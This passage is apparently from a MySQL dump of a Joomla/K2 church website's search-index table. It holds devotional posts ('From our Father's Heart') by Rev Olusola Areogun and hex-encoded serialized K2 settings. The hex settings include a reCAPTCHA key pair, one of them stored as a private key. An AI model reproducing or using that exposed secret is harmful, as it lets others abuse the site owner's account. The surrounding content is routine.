3b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a323a223137223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a31343a224661746865722773204865617274223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a33373a2234353a66726f6d2d6f75722d6661746865722d732d68656172742d33302d30342d32303137223b733a373a22636174736c7567223b733a31363a22353a6661746865722d732d6865617274223b733a363a22617574686f72223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a35353a22636f6d706f6e656e742f6b322f6974656d2f34352d66726f6d2d6f75722d6661746865722d732d68656172742d33302d30342d32303137223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a31343a224661746865722773204865617274223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a31343a224661746865722773204865617274223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3435223b733a353a22726f757465223b733a37343a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d34353a66726f6d2d6f75722d6661746865722d732d68656172742d33302d30342d32303137223b733a353a227469746c65223b733a33363a2246726f6d206f7572204661746865722773204865617274202833302f30342f3230313729223b733a31313a226465736372697074696f6e223b733a3332323a2220446561726c792042656c6f7665642c2054616b65206865656420746f20796f757220646976696e652063616c6c2120322054696d6f74687920313a3920392077686f2068617320736176656420757320616e642063616c6c65642075732077697468206120686f6c792063616c6c696e672c206e6f74206163636f7264696e6720746f206f757220776f726b732c20627574206163636f7264696e6720746f20486973206f776e20707572706f736520616e642067726163652077686963682077617320676976656e20746f20757320696e20436872697374204a65737573206265666f72652074696d6520626567616e2c20496620796f75206172652073617665642c20746865726520697320612063616c6c2075706f6e20796f7572206c69666520616e6420796f75206d7573742066696e6420746861742063616c6c2e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30342d33302031353a35313a3030223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30342d33302031353a35313a3030223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(270, 'index.php?option=com_k2&view=item&id=46', 'index.php?option=com_k2&view=item&id=46:from-our-father-s-heart-7-05-2017', 'From our Father\'s Heart (7/05/2017)', ' Dearly Beloved, Live Up To Your Calling! Raise your life to the level of your calling. Don\'t continue living at the level of your convenience. Jack up your life to the level of God\'s mandate over your life. Whether you like it or not, there is a divine call and mandate of heaven over your life that you must give account for when you come face-to-face with the Father in eternity and you need to raise your life to the level of that divine mandate. ', '2017-06-25 14:19:44', 'd598a12100bcb4827538575e7d0b3925', 1, 1, 1, '*', '2017-05-14 16:09:20', '0000-00-00 00:00:00', '2017-05-14 16:09:20', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223436223b733a353a22616c696173223b733a33333a2266726f6d2d6f75722d6661746865722d732d68656172742d372d30352d32303137223b733a373a2273756d6d617279223b733a3438303a223c703e446561726c792042656c6f7665642cc2a03c2f703e0d0a3c703e4c69766520557020546f20596f75722043616c6c696e6721c2a03c2f703e0d0a3c703e526169736520796f7572206c69666520746f20746865206c6576656c206f6620796f75722063616c6c696e672e20446f6e277420636f6e74696e7565206c6976696e6720617420746865206c6576656c206f6620796f757220636f6e76656e69656e63652e204a61636b20757020796f7572206c69666520746f20746865206c6576656c206f6620476f642773206d616e64617465206f76657220796f7572206c6966652e205768657468657220796f75206c696b65206974206f72206e6f742c207468657265206973206120646976696e652063616c6c20616e64206d616e64617465206f662068656176656e206f76657220796f7572206c696665207468617420796f75206d7573742067697665206163636f756e7420666f72207768656e20796f7520636f6d6520666163652d746f2d666163652077697468207468652046617468657220696e20657465726e69747920616e6420796f75206e65656420746f20726169736520796f7572206c69666520746f20746865206c6576656c206f66207468617420646976696e65206d616e646174652ec2a03c2f703e0d0a223b733a343a22626f6479223b733a313239363a220d0a3c703e4d616e792062656c69657665727320617265206c6976696e67206c6f776572207468616e207468652063616c6c206f6620476f642075706f6e207468656972206c697665732e2054686579206b6e6f772074686579206172652063616c6c65642c2074686579206861766520612073656e7365206f66207468652063616c6c2c20627574206861766520686f77657665722063686f73656e20746f207374617920617420636f6e76656e69656e6365206c6576656c207768657265207468656972206c6976657320617265206e6f74206265696e672064726976656e20616e64206861726e657373656420696e206163636f7264616e6365207769746820746865206361706163697479207468617420476f642068617320706c616365642077697468696e207468656d2ec2a03c2f703e0d0a3c703e42656c6f7665642c2074686520646576696c206f6e6c79207265636f676e697a657320796f7520696e207468652063616c6c20616e6420796f7520617265206f6e6c7920756e746f75636861626c6520746f2074686520656e656d79207768656e20796f7520617265206c6976696e6720617420746865206c6576656c206f6620476f6427732063616c6c206f76657220796f7572206c6966652e20497420697320796f757220616374697665206f7065726174696f6e20696e207468652063616c6c696e6720746861742073696c656e63657320616e64207465727269666965732074686520656e656d792e20546861742069732077687920686520747269657320746f206261747465722070656f706c6520616e64206d616b65207468656d20756e66697420666f722064657374696e79206265666f7265207468657920646973636f7665722e20486f77657665722c20796f75206172652070726976696c65676564206f6620476f6420746f20626520747261696e656420666f7220796f75722064657374696e7920616e642063616c6c696e672e205468657265666f72652c20656d627261636520697420616e64206a61636b20757020796f7572206c69666520746f20746865206c6576656c206f6620476f6427732063616c6c20666f7220796f752ec2a03c2f703e0d0a3c703e5468657265206172652074776f206e616d65732061206d616e2062656172733a3c2f703e0d0a3c703e312e20546865206e616d65206d656e2063616c6c20796f7520627920766972747565206f6620796f75722062697274682063697263756d7374616e6365732c2070726f626c656d73206f72206261636b67726f756e642e3c2f703e0d0a3c703e322e20546865206e616d65206f6620796f75722064657374696e79207468617420476f64206861732063616c6c656420796f752e205468617420697320746865206e616d6520796f75206d75737420646973636f76657220616e642066756c66696c6c2ec2a03c2f703e0d0a3c703e596f75206d757374206d616b6520757020796f7572206d696e6420746f20646973636f7665722074686174206e616d6520616e64206c6976652062792069742e2048656176656e20697320657870656374616e74206f76657220796f7572206c69666520616e6420796f75206d757374206e6f74206469736170706f696e742ec2a03c2f703e0d0a3c703e54696c6c206e657874207765656b2c20676f20616e642077696e2077697468204a657375732ec2a03c2f703e0d0a3c703e476f6427732053657276616e742c3c2f703e0d0a3c703e526576204f6c75736f6c61204172656f67756e3c2f703e223b733a353a226361746964223b733a313a2235223b733a31303a22637265617465645f6279223b733a333a22313939223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31313a226d6f6469666965645f6279223b733a313a2230223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b